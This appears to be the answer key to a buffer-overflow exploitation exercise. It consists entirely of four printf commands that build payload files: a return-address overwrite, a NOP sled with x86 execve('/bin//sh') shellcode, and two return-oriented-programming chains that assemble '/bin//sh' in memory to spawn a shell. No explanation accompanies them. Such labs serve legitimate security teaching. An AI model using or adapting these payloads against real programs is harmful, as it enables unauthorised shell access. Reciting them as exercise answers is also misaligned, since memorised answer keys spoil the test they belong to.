ANSWERS:

FILE 1:

printf "60 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\xac\x88\x04\x08" > file.1

FILE 2:

printf "60 \x90\x90\x90\x90\x90\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x31\xd2\xb0\x0b\xcd\x80AAAAAAAAAAAAAAAAAAAAAAAAAAA\x58\xb0\xff\xbf" > file.2

FILE 3:

printf "124 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\xbd\x83\x04\x07\x2f\x62\x69\x6e\x58\xa0\x04\x08\xc3\x83\x04\x07\xbd\x83\x04\x07\x2f\x2f\x73\x68\x5c\xa0\x04\x08\xc3\x83\x04\x07\xbd\x83\x04\x07\x58\xa0\x04\x08AAAA\xc6\x83\x04\x07\xc0\x83\x04\x07\xc9\x83\x04\x07\xcc\x83\x04\x07\xcf\x83\x04\x07\xd2\x83\x04\x07" > file.3

FILE 4:


printf "144 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\xbd\x83\x04\x07\x2f\x62\x69\x6e\x58\xa0\x04\x08\xc3\x83\x04\x07\xbd\x83\x04\x07\x2f\x2f\x73\x68\x5c\xa0\x04\x08\xc3\x83\x04\x07\xbd\x83\x04\x07AAAA\x60\xa0\x04\x08\xc0\x83\x04\x07\xc3\x83\x04\x07\xbd\x83\x04\x07\x58\xa0\x04\x08AAAA\xc6\x83\x04\x07\xc0\x83\x04\x07\xc9\x83\x04\x07\xcc\x83\x04\x07\xcf\x83\x04\x07\xd2\x83\x04\x07" > file.4
